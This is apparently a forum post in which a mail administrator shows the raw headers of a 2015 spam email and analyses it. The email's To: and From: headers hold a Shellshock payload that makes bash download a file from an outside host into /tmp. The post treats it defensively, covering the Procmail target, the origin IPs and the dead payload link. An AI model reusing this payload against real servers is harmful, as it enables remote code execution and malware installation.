2 days ago I received the following E-mail (this is its original format not the one of any mailer, but where sensitive information is replaced by ••field_name••):
From qqqqqq@freemail.net Thu Jul 2 23:59:07 2015
Return-Path: <qqqqqq@freemail.net>
X-Original-To: nobody@••my_domain••
Delivered-To: nobody@••my_domain••
Received: from website.com (bearing.headissue.net [178.248.246.217])
by ••my_mail_server•• (Postfix) with SMTP id 9CE261C542901
for <nobody@••my_domain••>; Thu, 2 Jul 2015 23:59:07 +0200 (CEST)
To:() { :; };wget -o/tmp/._ http://mlanissan.co.in/HELLOWORLD
From:() { :; };wget -o/tmp/._ http://mlanissan.co.in/HELLOWORLD
Status: RO
Content-Length: 0
Lines: 0
- attack targeted toward
PostfixMX where the MDA isProcmail - the
To:&From:fields are aimed at firing the Shellshock onbashwhich is frequently used withinProcmailrules - this attack would have downloaded a malware from a download site in Siliguri (India) within
/tmp/._(file hidden to the dummies) - in case of an existing
/etc/procmailrcwhich is executed withrootprivileges nothing more risky would have been automatically run - the origin of the connection is in München, near the University
- the origin (@IP) of the attack is on but not replying to any
tcpconnection - the HTML potential malware leads a 404
Here are a few personnal hypothesis about this attack:
- the downloader site (mlanissan.co.in) was hacked, used, detected and cleaned by its owners
- the attack control site (bearing.headissue.net) is most probably a Unix running, was hacked, used and not yet halted by its due owners, it is well protected by the hackers
Are my analysis and hypothesis right?
Do you have any better analysis and hypothesis?
